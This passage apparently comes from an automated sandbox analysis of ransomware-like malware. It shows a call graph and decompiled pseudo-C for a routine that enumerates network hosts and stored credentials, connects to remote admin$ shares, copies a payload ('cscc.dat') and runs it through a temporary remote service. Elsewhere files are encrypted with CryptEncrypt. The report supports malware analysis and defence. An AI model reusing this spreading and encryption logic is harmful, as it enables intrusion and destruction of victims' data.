6067 7b5d58 GetFileSizeEx 6066->6067 6068 7b5e7c CryptDestroyKey 6066->6068 6070 7b5da2 CreateFileMappingW 6067->6070 6075 7b5d78 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6067->6075 6068->6065 6069 7b5e8a 6068->6069 6069->6065 6073 7b5e8f SetEvent 6069->6073 6071 7b5e6e CloseHandle 6070->6071 6072 7b5dcd 6070->6072 6071->6068 6091 7b5a73 GetSystemInfo 6072->6091 6073->6065 6075->6070 6077 7b5e51 FindCloseChangeNotification 6077->6071 6079 7b5e5e 6077->6079 6078 7b5df3 MapViewOfFile 6080 7b5e0a CryptEncrypt 6078->6080 6086 7b5e4c 6078->6086 6117 7b5a11 GetFileSizeEx 6079->6117 6082 7b5e32 UnmapViewOfFile 6080->6082 6083 7b5e26 FlushViewOfFile 6080->6083 6082->6077 6084 7b5e3f 6082->6084 6083->6082 6105 7b5bc4 GetSystemInfo 6084->6105 6086->6077 6088 7b59c5 6087->6088 6088->6088 6089 7b59eb StrStrIW 6088->6089 6090 7b5a09 6089->6090 6090->6057 6092 7b5ac8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6091->6092 6093 7b5adb MapViewOfFile 6092->6093 6094 7b5afb 6093->6094 6095 7b5bba 6093->6095 6096 7b5baa 6094->6096 6097 7b5b26 CryptDuplicateHash 6094->6097 6095->6078 6095->6086 6098 7b5bb1 UnmapViewOfFile 6096->6098 6097->6098 6099 7b5b3c CryptHashData 6097->6099 6098->6095 6100 7b5b9f CryptDestroyHash 6099->6100 6101 7b5b53 LocalAlloc 6099->6101 6100->6098 6101->6100 6102 7b5b6b CryptGetHashParam 6101->6102 6103 7b5b98 LocalFree 6102->6103 6104 7b5b84 6102->6104 6103->6100 6104->6103 6106 7b5c19 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6105->6106 6107 7b5c2c MapViewOfFile 6106->6107 6108 7b5c4e CryptDuplicateHash 6107->6108 6109 7b5d00 6107->6109 6110 7b5c6b CryptHashData 6108->6110 6111 7b5cf7 UnmapViewOfFile 6108->6111 6109->6086 6112 7b5c7f LocalAlloc 6110->6112 6113 7b5cee CryptDestroyHash 6110->6113 6111->6109 6112->6113 6114 7b5c98 CryptGetHashParam 6112->6114 6113->6111 6115 7b5cae memcpy FlushViewOfFile 6114->6115 6116 7b5ce5 LocalFree 6114->6116 6115->6116 6116->6113 6118 7b5a6b 6117->6118 6119 7b5a33 6117->6119 6118->6071 6119->6118 6120 7b5a45 
SetFilePointerEx 6119->6120 6120->6118 6121 7b5a60 SetEndOfFile 6120->6121 6121->6118 6123 7ba760 6122->6123 6124 7b6106 wsprintfW PathCombineW 6123->6124 6125 7b6144 6124->6125 6127 7b623d 6124->6127 6141 7b6477 GetTickCount 6125->6141 6128 7b614a 6128->6127 6129 7b615a WaitForMultipleObjects 6128->6129 6129->6127 6130 7b617e CreateFileW 6129->6130 6131 7b623c 6130->6131 6132 7b61a2 6130->6132 6131->6127 6142 7b57e5 6132->6142 6135 7b61bb memset StrCatW StrCatW 6137 7b61fc 6135->6137 6136 7b6235 CloseHandle 6136->6131 6137->6137 6138 7b6207 WriteFile 6137->6138 6139 7b622c LocalFree 6138->6139 6140 7b6225 FlushFileBuffers 6138->6140 6139->6136 6140->6139 6141->6128 6143 7b59a8 6142->6143 6144 7b57fd LocalAlloc 6142->6144 6143->6135 6143->6136 6144->6143 6145 7b5818 GetSystemDefaultLCID GetTimeZoneInformation 6144->6145 6146 7b5838 6145->6146 6147 7b5841 memcpy NetWkstaGetInfo 6145->6147 6146->6147 6148 7b58fe 6147->6148 6153 7b586f 6147->6153 6163 7b56d8 6148->6163 6151 7b5918 LocalAlloc 6152 7b5992 LocalFree 6151->6152 6157 7b5930 memcpy 6151->6157 6152->6143 6153->6153 6154 7b58bc memcpy 6153->6154 6155 7b58cf 6153->6155 6154->6155 6156 7b58f2 NetApiBufferFree 6155->6156 6159 7b58de memcpy 6155->6159 6156->6148 6160 7b595a 6157->6160 6159->6156 6160->6160 6171 7b5780 CryptBinaryToStringW 6160->6171 6164 7b5776 6163->6164 6165 7b56ef 6163->6165 6164->6151 6164->6152 6165->6164 6166 7b56f7 CryptEncrypt 6165->6166 6166->6164 6167 7b571a LocalAlloc 6166->6167 6167->6164 6168 7b5731 memcpy CryptEncrypt 6167->6168 6168->6164 6169 7b5759 LocalFree 6168->6169 6169->6164 6172 7b57ce LocalFree 6171->6172 6173 7b57a4 LocalAlloc 6171->6173 6172->6152 6173->6172 6174 7b57b9 CryptBinaryToStringW 6173->6174 6174->6172 6175 7b57d5 LocalFree 6174->6175 6175->6172 6177 7b80fa 6176->6177 6177->6177 6178 7b8106 wsprintfW 6177->6178 6179 7b7fb7 6 API calls 6178->6179 6180 7b8142 6179->6180 6180->5199 6180->5200 6182 7b8183 CreateToolhelp32Snapshot 6181->6182 6182->5209 6182->5210 
6184 7ba1c9 6183->6184 6185 7ba1d0 GetProcessHeap HeapAlloc 6183->6185 6230 7ba016 GetCurrentThread OpenThreadToken 6184->6230 6187 7ba322 6185->6187 6188 7ba200 GetProcessHeap HeapAlloc 6185->6188 6188->6187 6189 7ba219 6188->6189 6190 7b6b0e 6 API calls 6189->6190 6192 7ba222 6190->6192 6191 7ba24e CreateThread 6191->6187 6191->6192 6330 7ba112 6191->6330 6192->6187 6192->6191 6193 7ba286 GetModuleHandleA GetProcAddress 6192->6193 6194 7ba237 6193->6194 6194->6187 6194->6192 6195 7ba2ea GetProcessHeap HeapAlloc 6194->6195 6196 7ba2d8 CloseHandle 6194->6196 6198 7b6ad0 3 API calls 6194->6198 6195->6187 6197 7ba2f9 GetProcessHeap HeapAlloc 6195->6197 6196->6195 6197->6187 6197->6194 6198->6194 6200 7b6b95 12 API calls 6199->6200 6201 7b77f1 6200->6201 6202 7b6b95 12 API calls 6201->6202 6203 7b77fc 6202->6203 6204 7b6b95 12 API calls 6203->6204 6205 7b7807 GetComputerNameExW 6204->6205 6206 7b7831 CreateThread 6205->6206 6207 7b7825 6205->6207 6209 7b7847 FindCloseChangeNotification 6206->6209 6213 7b784e 6206->6213 6447 7b8b2e 6206->6447 6208 7b6b95 12 API calls 6207->6208 6208->6206 6209->6213 6212 7b786f Sleep 6212->6213 6213->6212 6420 7b733c LoadLibraryW 6213->6420 6432 7b742c GetIpNetTable 6213->6432 6440 7b751b NetServerEnum 6213->6440 6217 7b8a95 6216->6217 6218 7b8a8b Sleep GetSystemMetrics 6217->6218 6219 7b8a99 SetEvent 6217->6219 6218->6217 6220 7b8aad 6219->6220 6221 7b8aa6 Sleep 6219->6221 6222 7b8a23 14 API calls 6220->6222 6221->6220 6223 7b8ab2 6222->6223 6224 7b8b1e LocalFree 6223->6224 6225 7b8ad3 htonl 6223->6225 6227 7b8ae0 htonl inet_ntoa 6223->6227 6229 7b6b95 12 API calls 6223->6229 6226 7ba567 8 API calls 6225->6226 6226->6223 6228 7b641a 3 API calls 6227->6228 6228->6223 6229->6223 6231 7ba05f 6230->6231 6232 7ba046 DuplicateTokenEx 6230->6232 6233 7b6c5f 13 API calls 6231->6233 6232->6231 6234 7ba07a 6233->6234 6251 7b75d8 WNetOpenEnumW 6234->6251 6239 7b6cc8 3 API calls 6240 7ba08e 6239->6240 6241 7b6b0e 6 API calls 6240->6241 6250 
7ba09a 6241->6250 6242 7ba0df 6243 7ba0fb 6242->6243 6244 7ba0f1 CloseHandle 6242->6244 6246 7ba101 CloseHandle 6243->6246 6247 7ba107 6243->6247 6244->6243 6246->6247 6247->6185 6248 7b6ad0 3 API calls 6248->6250 6249 7b6b5f StrCmpIW EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 6249->6250 6250->6242 6250->6248 6250->6249 6268 7b9534 6250->6268 6252 7b760b GlobalAlloc 6251->6252 6253 7b76e8 6251->6253 6252->6253 6258 7b7624 6252->6258 6260 7b76f2 CredEnumerateW 6253->6260 6254 7b7627 memset WNetEnumResourceW 6255 7b76ce GlobalFree WNetCloseEnum 6254->6255 6254->6258 6255->6253 6257 7b75d8 12 API calls 6257->6258 6258->6254 6258->6257 6259 7b6b95 12 API calls 6258->6259 6259->6258 6261 7b77c9 6260->6261 6263 7b771c 6260->6263 6261->6239 6262 7b77c0 CredFree 6262->6261 6263->6262 6264 7b6b95 12 API calls 6263->6264 6265 7b77be 6263->6265 6266 7b777e 6263->6266 6264->6263 6265->6262 6266->6263 6267 7b69ae 22 API calls 6266->6267 6267->6266 6269 7b9544 6268->6269 6270 7b985f SetLastError 6269->6270 6271 7b9560 wsprintfW 6269->6271 6270->6250 6306 7b88d3 6271->6306 6273 7b95b2 wsprintfW wsprintfW PathFindExtensionW 6275 7b960b wsprintfW 6273->6275 6276 7b9606 6273->6276 6277 7b962a WNetAddConnection2W PathFileExistsW 6275->6277 6276->6275 6278 7b96c8 6277->6278 6279 7b9653 GetLastError 6277->6279 6278->6270 6281 7b984b WNetCancelConnection2W 6278->6281 6280 7b87e7 3 API calls 6279->6280 6287 7b966e 6280->6287 6281->6270 6282 7b96d5 6284 7b96f4 6282->6284 6285 7b96df 6282->6285 6283 7b9674 GetLastError 6283->6278 6283->6287 6322 7b944f 6284->6322 6309 7b68b5 6285->6309 6287->6270 6287->6278 6287->6282 6287->6283 6294 7b96ad WNetCancelConnection2W 6287->6294 6291 7b982a GetLastError 6293 7b9830 6291->6293 6292 7b9726 memset GetSystemTimeAsFileTime wsprintfW 6296 7b9789 6292->6296 6293->6278 6295 7b9836 DeleteFileW 6293->6295 6294->6277 6295->6278 6297 7b9809 GetLastError 6296->6297 6298 7b9791 StartServiceW 6296->6298 6299 7b981e 
CloseServiceHandle 6297->6299 6300 7b9816 6297->6300 6301 7b97b3 6298->6301 6302 7b97a6 GetLastError 6298->6302 6299->6293 6300->6299 6303 7b97cc QueryServiceStatus 6301->6303 6304 7b97f3 DeleteService CloseServiceHandle 6301->6304 6305 7b97e6 Sleep 6301->6305 6302->6301 6303->6301 6303->6304 6304->6299 6305->6303 6305->6304 6307 7b88de PathFindFileNameW 6306->6307 6308 7b88ed 6306->6308 6307->6308 6308->6273 6308->6308 6310 7b68cd 6309->6310 6310->6310 6311 7b68d8 GetProcessHeap HeapAlloc 6310->6311 6312 7b6901 memcpy 6311->6312 6313 7b69a5 6311->6313 6315 7b692f 6312->6315 6313->6284 6315->6315 6316 7b693a GetProcessHeap HeapAlloc 6315->6316 6317 7b699a GetProcessHeap HeapFree 6316->6317 6318 7b6958 memcpy 6316->6318 6317->6313 6320 7b6e1b 5 API calls 6318->6320 6321 7b698e GetProcessHeap HeapFree 6320->6321 6321->6317 6323 7b945c 6322->6323 6324 7b88d3 PathFindFileNameW 6323->6324 6325 7b9489 6324->6325 6326 7b6cc8 3 API calls 6325->6326 6329 7b94f2 OpenSCManagerW 6325->6329 6327 7b94e1 6326->6327 6328 7b6735 14 API calls 6327->6328 6328->6329 6329->6291 6329->6292 6331 7ba19e 6330->6331 6332 7ba125 6330->6332 6333 7ba14d 6332->6333 6343 7b9f7a 6332->6343 6335 7ba160 6333->6335 6336 7ba155 6333->6336 6341 7ba171 6333->6341 6338 7ba182 GetProcessHeap HeapFree GetProcessHeap HeapFree 6335->6338 6340 7b9534 62 API calls 6335->6340 6350 7b98ab 6336->6350 6338->6331 6339 7ba15c 6339->6335 6339->6341 6340->6341 6341->6338 6342 7b6b5f 5 API calls 6341->6342 6342->6338 6344 7b686c 6 API calls 6343->6344 6348 7b9f98 6344->6348 6345 7ba006 6345->6333 6346 7b9534 62 API calls 6346->6348 6348->6345 6348->6346 6349 7b6893 3 API calls 6348->6349 6361 7b9b63 6348->6361 6349->6348 6351 7b6ced 6 API calls 6350->6351 6352 7b98c8 6351->6352 6353 7b98d7 CreateThread 6352->6353 6357 7b9961 6352->6357 6360 7b6d35 3 API calls 6352->6360 6353->6352 6354 7b990a SetThreadToken 6353->6354 6355 7b993a CloseHandle 6354->6355 6356 7b9919 ResumeThread 6354->6356 6355->6352 6358 7b9927 
WaitForSingleObject 6356->6358 6359 7b9934 GetLastError 6356->6359 6357->6339 6358->6355 6359->6355 6360->6352 6362 7b9b70 6361->6362 6363 7b9f01 SetLastError 6362->6363 6364 7b9b87 wsprintfW 6362->6364 6363->6348 6365 7b88d3 PathFindFileNameW 6364->6365 6367 7b9bdb wsprintfW wsprintfW PathFindExtensionW 6365->6367 6368 7b9c2c 6367->6368 6369 7b9c31 wsprintfW 6367->6369 6368->6369 6370 7b9c4a WNetAddConnection2W PathFileExistsW 6369->6370 6371 7b9c73 GetLastError 6370->6371 6392 7b9ceb 6370->6392 6372 7b87e7 3 API calls 6371->6372 6379 7b9c94 6372->6379 6373 7b9eef WNetCancelConnection2W 6373->6363 6374 7b9c9a GetLastError 6374->6379 6374->6392 6375 7b9cf3 6376 7b9d0e GetCurrentThread OpenThreadToken 6375->6376 6382 7b68b5 15 API calls 6375->6382 6377 7b9d2c DuplicateTokenEx 6376->6377 6378 7b9d42 memset GetSystemDirectoryW 6376->6378 6377->6378 6380 7b9d9e PathAppendW PathFileExistsW 6378->6380 6381 7b9eb0 GetLastError 6378->6381 6379->6363 6379->6374 6379->6375 6388 7b9cd4 WNetCancelConnection2W 6379->6388 6379->6392 6383 7b9ebe DeleteFileW 6380->6383 6384 7b9dc5 wsprintfW 6380->6384 6385 7b9eb6 6381->6385 6386 7b9d08 6382->6386 6409 7b9ecd 6383->6409 6411 7b9972 6384->6411 6385->6383 6385->6409 6386->6376 6388->6370 6389 7b9edc 6391 7b9ee1 CloseHandle 6389->6391 6389->6392 6390 7b9ed4 CloseHandle 6390->6389 6391->6392 6392->6363 6392->6373 6393 7b9df2 6394 7b9ea6 GetLastError 6393->6394 6395 7b9e2c CreateProcessW 6393->6395 6396 7b9e21 CreateProcessAsUserW 6393->6396 6394->6385 6397 7b9e32 6395->6397 6396->6397 6397->6394 6398 7b9e36 WaitForSingleObject GetExitCodeProcess 6397->6398 6399 7b9e5b 6398->6399 6400 7b9e56 CloseHandle 6398->6400 6401 7b9e60 CloseHandle 6399->6401 6402 7b9e65 6399->6402 6400->6399 6401->6402 6403 7b9e6a CloseHandle 6402->6403 6404 7b9e6f 6402->6404 6403->6404 6405 7b9e79 6404->6405 6406 7b9e74 CloseHandle 6404->6406 6407 7b9e7e CloseHandle 6405->6407 6408 7b9e83 6405->6408 6406->6405 6407->6408 6408->6409 6410 7b9e92 PathFileExistsW 
6408->6410 6409->6389 6409->6390 6410->6385 6412 7b997f 6411->6412 6413 7b88d3 PathFindFileNameW 6412->6413 6414 7b9992 wsprintfW 6413->6414 6415 7b9abd 6414->6415 6415->6415 6416 7b9ae9 wsprintfW 6415->6416 6417 7b6735 14 API calls 6416->6417 6418 7b9b28 wsprintfW 6417->6418 6418->6393 6421 7b735b GetProcAddress 6420->6421 6422 7b7425 6420->6422 6423 7b7373 RtlAllocateHeap 6421->6423 6424 7b7414 GetLastError 6421->6424 6422->6213 6425 7b741a FreeLibrary 6423->6425 6427 7b7398 GetExtendedTcpTable 6423->6427 6424->6425 6425->6422 6428 7b73ae 6427->6428 6429 7b7402 6427->6429 6428->6429 6430 7b73c0 wsprintfW 6428->6430 6429->6425 6431 7b6b95 12 API calls 6430->6431 6431->6428 6433 7b7458 6432->6433 6436 7b7451 6432->6436 6434 7b746c HeapAlloc 6433->6434 6433->6436 6435 7b7480 GetIpNetTable 6434->6435 6434->6436 6435->6436 6437 7b748c 6435->6437 6436->6213 6437->6436 6438 7b74bc wsprintfW 6437->6438 6439 7b6b95 12 API calls 6438->6439 6439->6437 6445 7b7556 6440->6445 6441 7b755d 6442 7b75cf 6441->6442 6443 7b75c6 NetApiBufferFree 6441->6443 6442->6212 6443->6442 6444 7b751b 12 API calls 6444->6445 6445->6441 6445->6442 6445->6444 6446 7b6b95 12 API calls 6445->6446 6446->6445 6448 7ba760 6447->6448 6449 7b8b3e memset memset GetAdaptersInfo 6448->6449 6450 7b8b9a LocalAlloc 6449->6450 6451 7b8d2e 6449->6451 6450->6451 6452 7b8bb4 GetAdaptersInfo 6450->6452 6453 7b8d24 LocalFree 6452->6453 6464 7b8bc4 6452->6464 6453->6451 6454 7b8bd2 inet_addr inet_addr 6469 7b641a MultiByteToWideChar 6454->6469 6455 7b8c77 6474 7b7d4e NetServerGetInfo 6455->6474 6459 7b8d0d 6459->6453 6463 7b8d13 CloseHandle 6459->6463 6461 7b641a 3 API calls 6461->6464 6462 7b8c94 LocalAlloc 6465 7b8ca4 inet_addr 6462->6465 6466 7b8c88 6462->6466 6463->6453 6463->6463 6464->6454 6464->6455 6464->6461 6467 7b6b95 12 API calls 6464->6467 6465->6466 6466->6459 6466->6462 6468 7b8ccf htonl htonl CreateThread 6466->6468 6467->6464 6468->6466 6502 7b8ab3 6468->6502 6470 7b646e 6469->6470 6471 7b6442 
HeapAlloc 6469->6471 6470->6464 6471->6470 6473 7b645a MultiByteToWideChar 6471->6473 6473->6470 6475 7b7d6c 6474->6475 6476 7b7d88 6475->6476 6477 7b7d81 NetApiBufferFree 6475->6477 6476->6466 6478 7b8d39 GetComputerNameExW DhcpEnumSubnets 6476->6478 6477->6476 6479 7b8ea0 6478->6479 6488 7b8db0 6478->6488 6479->6466 6480 7b8dc0 DhcpGetSubnetInfo 6480->6488 6481 7b8e97 DhcpRpcFreeMemory 6481->6479 6482 7b8de8 DhcpEnumSubnetClients 6482->6488 6483 7b8e7e DhcpRpcFreeMemory 6483->6488 6484 7b8e2e htonl 6490 7ba567 6484->6490 6486 7b8e42 htonl inet_ntoa 6487 7b641a 3 API calls 6486->6487 6487->6488 6488->6480 6488->6481 6488->6482 6488->6483 6488->6484 6488->6486 6489 7b6b95 12 API calls 6488->6489 6489->6488 6495 7ba476 memset socket 6490->6495 6493 7ba58b 6493->6488 6494 7ba476 8 API calls 6494->6493 6496 7ba55d 6495->6496 6497 7ba4d3 htons ioctlsocket 6495->6497 6496->6493 6496->6494 6498 7ba502 connect select 6497->6498 6499 7ba556 closesocket 6497->6499 6498->6499 6500 7ba541 __WSAFDIsSet 6498->6500 6499->6496 6500->6499 6501 7ba553 6500->6501 6501->6499 6503 7b8b1e LocalFree 6502->6503 6504 7b8acd 6502->6504 6504->6503 6505 7b8ad3 htonl 6504->6505 6507 7b8ae0 htonl inet_ntoa 6504->6507 6509 7b6b95 12 API calls 6504->6509 6506 7ba567 8 API calls 6505->6506 6506->6504 6508 7b641a 3 API calls 6507->6508 6508->6504 6509->6504 6577 7b988b 6578 7b9534 62 API calls 6577->6578 6579 7b98a2 6578->6579 6529 7b682f 6530 7b683a 6529->6530 6531 7b6865 6529->6531 6532 7b684e GetProcessHeap HeapFree 6530->6532 6533 7b6856 6530->6533 6532->6533 6533->6531 6534 7b685d GetProcessHeap HeapFree 6533->6534 6534->6531 6535 7bc4a6 free 6536 7bace4 6540 7ba8be 6536->6540 6537 7bbecb 3 API calls 6539 7baed0 6537->6539 6538 7bbb4f 6538->6537 6538->6539 6540->6538 6540->6539 6541 7bac8f memcpy 6540->6541 6541->6540

Control-flow Graph

[Figure: control-flow graph for the function at 7b9534. Legend: Executed / Not Executed]
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B9534(int _a4, short* _a8, int _a12, short** _a16, long _a32, int _a36, void _a40, int _a44, void* _a48, struct _FILETIME _a52, void* _a56, struct _NETRESOURCE _a60, struct _SERVICE_STATUS _a100, intOrPtr _a104, short _a120, void _a122, short _a128, short _a152, char _a160, short _a184, char _a676, char _a680, char _a684, short _a1204, short _a1216, short _a1224, short _a3244, short _a3272, short _a5300, short _a5308, char _a7368, short _a7376) {
                                                                                                                                                                                        				int _v0;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				short** _t78;
                                                                                                                                                                                        				WCHAR* _t96;
                                                                                                                                                                                        				int _t100;
                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                        				long _t124;
                                                                                                                                                                                        				int _t126;
                                                                                                                                                                                        				long _t131;
                                                                                                                                                                                        				long _t133;
                                                                                                                                                                                        				int _t137;
                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                        				WCHAR* _t151;
                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                        
                                                                                                                                                                                        				E007BA760(0x11cac);
                                                                                                                                                                                        				_t137 = _a4;
                                                                                                                                                                                        				_a4 = 0;
                                                                                                                                                                                        				_v0 = 0;
                                                                                                                                                                                        				_a12 = 0;
                                                                                                                                                                                        				if(_t137 == 0) {
                                                                                                                                                                                        					_v0 = 0x57;
                                                                                                                                                                                        					goto L36;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_a152 = 0;
                                                                                                                                                                                        					wsprintfW( &_a152, L"\\\\%s\\admin$", _t137);
                                                                                                                                                                                        					_a36 = 0;
                                                                                                                                                                                        					_t143 = 7;
                                                                                                                                                                                        					memset( &_a40, 0, _t143 << 2);
                                                                                                                                                                                        					_a56 =  &_a160;
                                                                                                                                                                                        					_a40 = 1;
                                                                                                                                                                                        					E007B88D3( &_a680);
                                                                                                                                                                                        					_t151 = L"\\\\%ws\\admin$\\%ws";
                                                                                                                                                                                        					wsprintfW( &_a3244, _t151, _t137,  &_a676);
                                                                                                                                                                                        					_a5300 = 0;
                                                                                                                                                                                        					_a1204 = 0;
                                                                                                                                                                                        					wsprintfW( &_a5300, _t151, _t137,  &_a684);
                                                                                                                                                                                        					_t96 = PathFindExtensionW( &_a5308);
                                                                                                                                                                                        					if(_t96 != 0) {
                                                                                                                                                                                        						 *_t96 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					wsprintfW( &_a1216, _t151, _t137, L"cscc.dat");
                                                                                                                                                                                        					_a40 = _a40 & 0x00000000;
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						_t100 = WNetAddConnection2W( &_a60, _a12, _a8, 0); // executed
                                                                                                                                                                                        						_a44 = _t100;
                                                                                                                                                                                        						if(PathFileExistsW( &_a1224) != 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						GetLastError();
                                                                                                                                                                                        						if(E007B87E7( *0x7c7b94,  &_a3272,  *0x7c3984) != 0) {
                                                                                                                                                                                        							if(_a8 != 0 && _a12 != 0) {
                                                                                                                                                                                        								E007B68B5(_a8, _a12);
                                                                                                                                                                                        								 *0x7c3010 = 1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_a7368 = 0;
                                                                                                                                                                                        							E007B944F( &_a7368);
                                                                                                                                                                                        							_t111 = OpenSCManagerW(_a4, 0, 0xf003f);
                                                                                                                                                                                        							_a44 = _t111;
                                                                                                                                                                                        							if(_t111 == 0) {
                                                                                                                                                                                        								_a32 = GetLastError();
                                                                                                                                                                                        								goto L31;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_a120 = 0;
                                                                                                                                                                                        								memset( &_a122, 0, 0x3e);
                                                                                                                                                                                        								GetSystemTimeAsFileTime( &_a52);
                                                                                                                                                                                        								wsprintfW( &_a120, L"%08X%08X", _a56, _a52.dwLowDateTime);
                                                                                                                                                                                        								_t123 = CreateServiceW(_a56,  &_a128, 0, 0xf01ff, 0x10, 3, 0,  &_a7376, 0, 0, 0, 0, 0);
                                                                                                                                                                                        								_a48 = _t123;
                                                                                                                                                                                        								if(_t123 == 0) {
                                                                                                                                                                                        									_t124 = GetLastError();
                                                                                                                                                                                        									_a40 = _t124;
                                                                                                                                                                                        									if(_t124 == 0x431) {
                                                                                                                                                                                        										_a44 = 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L29:
                                                                                                                                                                                        									CloseServiceHandle(_a56);
                                                                                                                                                                                        									L31:
                                                                                                                                                                                        									if(_a36 == 0) {
                                                                                                                                                                                        										DeleteFileW( &_a3272);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L33:
                                                                                                                                                                                        									if(_a44 == 0) {
                                                                                                                                                                                        										WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L36:
                                                                                                                                                                                        									_t78 = _a16;
                                                                                                                                                                                        									if(_t78 != 0) {
                                                                                                                                                                                        										 *_t78 = _a12;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									SetLastError(_v0);
                                                                                                                                                                                        									return _a4;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_a40 = 0;
                                                                                                                                                                                        								_t126 = StartServiceW(_t123, 0, 0);
                                                                                                                                                                                        								_a44 = _t126;
                                                                                                                                                                                        								if(_t126 != 0) {
                                                                                                                                                                                        									L22:
                                                                                                                                                                                        									_t153 = 0xea60;
                                                                                                                                                                                        									while(QueryServiceStatus(_a48,  &_a100) != 0 && _a104 != 1) {
                                                                                                                                                                                        										Sleep(0x1388);
                                                                                                                                                                                        										_t153 = _t153 - 0x1388;
                                                                                                                                                                                        										if(_t153 > 0) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										break;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L26:
                                                                                                                                                                                        									DeleteService(_a48);
                                                                                                                                                                                        									CloseServiceHandle(_a48);
                                                                                                                                                                                        									goto L29;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t131 = GetLastError();
                                                                                                                                                                                        								_a40 = _t131;
                                                                                                                                                                                        								if(_t131 == 0x41d || _t131 == 0x420) {
                                                                                                                                                                                        									_a44 = 1;
                                                                                                                                                                                        									goto L22;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									goto L26;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t133 = GetLastError();
                                                                                                                                                                                        						_a32 = _t133;
                                                                                                                                                                                        						if(_t133 == 0x50 || _t133 == 0x35 || _t133 == 0x43 || _a44 != 0x4c3) {
                                                                                                                                                                                        							goto L33;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							if(_a40 != 0) {
                                                                                                                                                                                        								goto L36;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                                                                                                        							_a40 = 1;
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_a36 = 1;
                                                                                                                                                                                        					goto L33;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}


















                                                                                                                                                                                        0x007b95fc
                                                                                                                                                                                        0x007b9604
                                                                                                                                                                                        0x007b9608
                                                                                                                                                                                        0x007b9608
                                                                                                                                                                                        0x007b961a
                                                                                                                                                                                        0x007b9625
                                                                                                                                                                                        0x007b962a
                                                                                                                                                                                        0x007b9637
                                                                                                                                                                                        0x007b963d
                                                                                                                                                                                        0x007b9651
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9653
                                                                                                                                                                                        0x007b9672
                                                                                                                                                                                        0x007b96d8
                                                                                                                                                                                        0x007b96e5
                                                                                                                                                                                        0x007b96ea
                                                                                                                                                                                        0x007b96ea
                                                                                                                                                                                        0x007b96f6
                                                                                                                                                                                        0x007b9706
                                                                                                                                                                                        0x007b9714
                                                                                                                                                                                        0x007b971a
                                                                                                                                                                                        0x007b9720
                                                                                                                                                                                        0x007b982c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9726
                                                                                                                                                                                        0x007b972a
                                                                                                                                                                                        0x007b9735
                                                                                                                                                                                        0x007b9742
                                                                                                                                                                                        0x007b975a
                                                                                                                                                                                        0x007b9783
                                                                                                                                                                                        0x007b9789
                                                                                                                                                                                        0x007b978f
                                                                                                                                                                                        0x007b9809
                                                                                                                                                                                        0x007b980b
                                                                                                                                                                                        0x007b9814
                                                                                                                                                                                        0x007b9816
                                                                                                                                                                                        0x007b9816
                                                                                                                                                                                        0x007b981e
                                                                                                                                                                                        0x007b9822
                                                                                                                                                                                        0x007b9830
                                                                                                                                                                                        0x007b9834
                                                                                                                                                                                        0x007b983e
                                                                                                                                                                                        0x007b983e
                                                                                                                                                                                        0x007b9844
                                                                                                                                                                                        0x007b9849
                                                                                                                                                                                        0x007b9857
                                                                                                                                                                                        0x007b9857
                                                                                                                                                                                        0x007b9867
                                                                                                                                                                                        0x007b9867
                                                                                                                                                                                        0x007b986c
                                                                                                                                                                                        0x007b9872
                                                                                                                                                                                        0x007b9872
                                                                                                                                                                                        0x007b9878
                                                                                                                                                                                        0x007b9888
                                                                                                                                                                                        0x007b9888
                                                                                                                                                                                        0x007b9794
                                                                                                                                                                                        0x007b9798
                                                                                                                                                                                        0x007b979e
                                                                                                                                                                                        0x007b97a4
                                                                                                                                                                                        0x007b97c2
                                                                                                                                                                                        0x007b97c2
                                                                                                                                                                                        0x007b97cc
                                                                                                                                                                                        0x007b97e7
                                                                                                                                                                                        0x007b97ed
                                                                                                                                                                                        0x007b97f1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b97f1
                                                                                                                                                                                        0x007b97f3
                                                                                                                                                                                        0x007b97f7
                                                                                                                                                                                        0x007b9801
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b9801
                                                                                                                                                                                        0x007b97a6
                                                                                                                                                                                        0x007b97a8
                                                                                                                                                                                        0x007b97b1
                                                                                                                                                                                        0x007b97ba
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b97b1
                                                                                                                                                                                        0x007b9720
                                                                                                                                                                                        0x007b9674
                                                                                                                                                                                        0x007b9676
